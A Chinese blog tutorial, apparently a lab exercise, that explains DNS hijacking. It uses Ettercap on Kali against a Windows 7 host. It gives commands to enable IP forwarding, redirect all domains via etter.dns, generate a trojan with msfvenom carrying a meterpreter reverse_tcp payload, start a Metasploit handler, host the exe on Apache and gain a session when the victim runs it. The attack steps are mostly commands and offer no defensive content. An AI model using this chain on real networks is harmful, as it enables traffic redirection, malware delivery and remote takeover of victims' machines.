DNS劫持

初试DNS劫持

DNS劫持

1.DNS劫持介绍

DNS劫持是指在浏览器访问网站时,恶意程序或黑客将域名解析到错误的IP地址,导致用户无法正常访问网站或被导向其他网站的情况。DNS劫持通常发生在网络中某个节点处,通过修改本地DNS缓存或篡改DNS服务器的响应来实现。

2.环境搭建

2.1环境介绍

主机系统IP地址
攻击机kali-linux192.168.72.129
受击机windows 7192.168.72.130

主要使用的技术是kali的Ettercap

2.2环境介绍

2.2.1确定80端口没有被任何程序占用,若被占用则需杀掉端口

端口:每一个应用程序都有对应的端口;80端口就是apache 服务端口,我们需要确保此端口没被占用;
输入命令:lsof -i:80 判断是否被占用
在这里插入图片描述

2.2.2开启端口转发

root
ip-forward 改为1

echo 1 > /proc/sys/net/ipv4/ip_forward
2.2.3开启apache
service apache2 restart
2.2.4测试apache 服务器是否开启

在kali的浏览器中输入 kali的 IP地址
在这里插入图片描述

2.2.5查看本机IP

ifconfig

2.2.6修改 etter.dns 将目标改为本机ip
sudo vi /etc/ettercap/etter.dns

在这里插入图片描述
进入编辑模式,输入命令:

*   A   本机ip

3.使用ettercap进行劫持

3.1启用etterrcap

在这里插入图片描述

3.2

在菜单中找到 Plugins ,选中Manage Plugins
在这里插入图片描述

4.在kali中向Windows中植入木马

4.1生成木马

输入命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe  x>木马文件.exe

在这里插入图片描述
完成后输入pwd即可查看位置;

4.2配置文件并启动监听

输入命令:msfconsole
在这里插入图片描述

输入命令:use exploit/multi/handler
在这里插入图片描述
输入命令:set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
输入命令:set lhost kali的ip
在这里插入图片描述
输入命令:exploit -z -j
在这里插入图片描述
启动监听;输入命令:run
在这里插入图片描述

5.复制木马文件到 /var/www/html

5.1受击机运行木马

在这里插入图片描述
输入命令:service apache2 start
进入Windows虚拟机中,打开网址"kali的ip/木马名称"
在这里插入图片描述

5.2在kali中监听受击机

输入命令:sessions
即可查看被木马如今的用户
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值